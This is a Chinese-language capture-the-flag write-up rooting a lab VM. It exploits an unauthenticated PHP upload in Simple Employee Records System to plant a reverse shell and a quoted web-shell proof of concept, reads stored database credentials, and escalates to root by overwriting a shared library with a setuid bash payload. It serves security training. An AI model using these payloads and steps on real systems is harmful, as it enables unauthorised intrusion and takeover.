Sml

靶机说明

QQ群：660930334

一、主机探测

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# nmap -sn 192.168.2.0/24               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-10 15:36 CST
Nmap scan report for 192.168.2.1
Host is up (0.00044s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00027s latency).
MAC Address: 08:00:27:DB:21:14 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.52
Host is up (0.00096s latency).
MAC Address: 08:00:27:96:5F:B8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.04 seconds

靶机IP：192.168.2.52

二、端口扫描

1、全端口扫描

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# nmap --min-rate 10000 -p- 192.168.2.52                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-10 17:13 CST
Nmap scan report for 192.168.2.52
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:96:5F:B8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 39.98 seconds

开放端口：22,80

2、详细信息扫描

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.52               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-10 17:13 CST
Nmap scan report for 192.168.2.52
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Hello everyone!
MAC Address: 08:00:27:96:5F:B8 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.51 seconds

3、UDP端口扫描

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# nmap -sU --top-ports 100 192.168.2.52
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-10 17:11 CST
Nmap scan report for 192.168.2.52
Host is up (0.00090s latency).
All 100 scanned ports on 192.168.2.52 are in ignored states.
Not shown: 57 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
MAC Address: 08:00:27:96:5F:B8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 53.81 seconds

没有开放的端口

三、WEB渗透

访问80端口，是一个页面登录框

1、employee_records_system-CVE

查看页面源码，找到了是employee_records_system系统

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# curl http://192.168.2.52
<!doctype html>
<html class="no-js" lang="">
    <head>
        <meta charset="utf-8">
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <title>Hello everyone!</title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" type="text/css" href="css/jquery-ui.css" />
        <link rel="stylesheet" type="text/css" href="css/style.css" />
        <link href="css/font-awesome.min.css" type="text/css" rel="stylesheet">
        <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet">
        <link href="https://fonts.googleapis.com/css?family=Roboto+Condensed" rel="stylesheet">
        <script type="text/javascript" src="js/jquery.min.js"></script>
        <script type="text/javascript" src="js/jquery-ui.min.js"></script>
    </head>
 <body id="loginPage">
        <div class="login_wrapper clearfix">
                <div class="LogResponse"></div>
                <div class="login_wrapper_inner">
<!-- https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip -->
                        <form id="loginForm" class="clearfix" method="post" action="">
                                <div class="input-box">
                                        <input type="text" class="inputField username" name="username" placeholder="username">
                                        <div class="error usernameerror"></div>
                                </div>
                                <div class="input-box">
                                        <input  type="password" class="inputField password" name="password" placeholder="password">
                                        <div class="error passworderror"></div>
                                </div>

                                <div class="input-box">
                                        <button  type="submit" class="submitField sign_in"><span class="sign-icon"><i class="fa fa-lock"></i></span> Sign in</button>
                                </div>
                        </form>
                </div>
        </div>
 <div class="body_overlay"></div>
 
  <script type="text/javascript" src="./js/global.js"></script>
 </body>
 </html>

查找employee_records_system的CVE漏洞，找到存在文件上传的漏洞

上传反弹shell的文件，得到上传后的文件名UnIhBA3TZQwDVPf_rev.php

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# curl http://192.168.2.52/dashboard/uploadID.php -X POST -F 'employee_ID=@rev.php;filename=rev.php' 
{"upload_filename":"UnIhBA3TZQwDVPf_rev.php","selected_filename":"rev.php"}  

四、获取www-data权限

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# nc -lvnp 4444                                                                                                           
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.52] 55854
/usr/bin/script -qc /bin/bash /dev/null
www-data@sML:/var/www/html/uploads/employees_ids$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

USER FLAG

www-data@sML:/home/yulian$ cat user.txt 
flag{user-fde7951c3a57bc71b03631a9673ab67e}

五、权限提升

1、获取USER权限

找到数据库的用户名和密码，进行连接

www-data@sML:/var/www/html/inc$ cat db_connect.php 
<?php
$mysql_hostname = "localhost";
$mysql_user = "root";
$mysql_password = "root";
$mysql_database = "sharp_db";

$db_connect = mysqli_connect($mysql_hostname, $mysql_user,$mysql_password, $mysql_database) or ("Could not connect database");
?>

www-data@sML:/var/www/html/inc$ mysql -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 15
Server version: 10.5.23-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>  select * from users;
+---------+-----------+----------+----------+----------------------------------+-------------+
| user_id | firstname | lastname | username | password                         | accounttype |
+---------+-----------+----------+----------+----------------------------------+-------------+
|       1 | Maxwell   | Morrison | xxx2xy   | 10a55271c201e41913764ff95b33248b | Admin       |
|       3 | Maxwell   | Morrison | admins   | 02adcdf2171dc7e5757cdd7c0b91fa03 | Admin       |
|       2 | Maxwell   | Morrison | yulian   | fde7951c3a57bc71b03631a9673ab67e | Admin       |
+---------+-----------+----------+----------+----------------------------------+-------------+
3 rows in set (0.000 sec)

找到用户yulian的密码fde7951c3a57bc71b03631a9673ab67e，进行连接

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# ssh yulian@192.168.2.52
yulian@192.168.2.52's password: 
Linux sML 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
yulian@sML:~$ id
uid=1000(yulian) gid=1000(yulian) groups=1000(yulian)

2、重新构造库文件

用户yulian的/home目录下面找到一个文件get_root，尝试去运行，发现输出hello world

www-data@sML:/home/yulian$ ./get_root
Starting get_root program...
hello world

查看文件加载的库，发现加载了/usr/lib/sML/libxxoo.so

yulian@sML:~$ ldd get_root 
        linux-vdso.so.1 (0x00007ffd20857000)
        libxxoo.so => /usr/lib/sML/libxxoo.so (0x00007fe9c25be000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe9c23e1000)
        /lib64/ld-linux-x86-64.so.2 (0x00007fe9c25ca000)

查看库

yulian@sML:~$ strings /usr/lib/sML/libxxoo.so
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
__cxa_finalize
hello
puts
libc.so.6
GLIBC_2.2.5
u/UH
hello world
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
xxoo.c
__FRAME_END__
_fini
__dso_handle
_DYNAMIC
__GNU_EH_FRAME_HDR
__TMC_END__
_GLOBAL_OFFSET_TABLE_
_init
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
hello
__gmon_start__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

重写一个库，覆盖/usr/lib/sML/libxxoo.so

yulian@sML:~$ vi xxoo.c
yulian@sML:~$ cat xxoo.c 
#include<stdlib.h>
#include<stdio.h>
#include<unistd.h>



void hello(){
        setuid(0);
        setgid(0);
        system("/bin/bash -p");
}

编译xxoo.c文件

yulian@sML:~$ gcc -shared -fPIC -o malicious.so xxoo.c

将编译后的文件重定向至/usr/lib/sML/libxxoo.so

yulian@sML:~$ cat malicious.so > /usr/lib/sML/libxxoo.so

2、获取ROOT权限

直接运行get_root即可

yulian@sML:~$ ./get_root
Starting get_root program...
root@sML:~# id
uid=0(root) gid=0(root) groups=0(root),1000(yulian)

ROOT FLAG

root@sML:/root# cat root.txt 
flag{root-4c850c5b3b2756e67a91bad8e046ddac}

【总结】

1、employee_records_system漏洞

https://www.exploit-db.com/exploits/49596

# Exploit Title: Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)
# Date: 2021-02-25
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://www.sourcecodester.com/php/11393/employee-records-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip
# Version: v1.0
# Tested on: Ubuntu 20.04.2

uploadID.php can be used to upload .php files to 
'/uploads/employees_ids/' without authentication.

POC
---

1) Make the following Request changing the "Host:" to your Victim IP.

POST /dashboard/uploadID.php HTTP/1.1
Host: 192.168.1.117
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 
Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; 
boundary=---------------------------5825462663702204104870787337
Content-Length: 267
DNT: 1
Connection: close

-----------------------------5825462663702204104870787337
Content-Disposition: form-data; name="employee_ID"; filename="cmd2.php"
Content-Type: image/png
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
-----------------------------5825462663702204104870787337--


2) You will get the response with the name of the uploaded file 
(upload_filename).

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 25 Feb 2021 19:17:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77
{"upload_filename":"Ag1rzKFWTlnCZhL_cmd2.php","selected_filename":"cmd2.php"}

3) Your file will be located in: 
http://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php

4) In this example, to run commands:
http://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami

或者使用curl

curl http://192.168.2.52/dashboard/uploadID.php -X POST -F 'employee_ID=@rev.php;filename=rev.php' 

2、重写库提权

查看文件引用的库

ldd <文件名>

编译文件

gcc -shared -fPIC -o <编译好的库名.so> <需要编译的文件.c>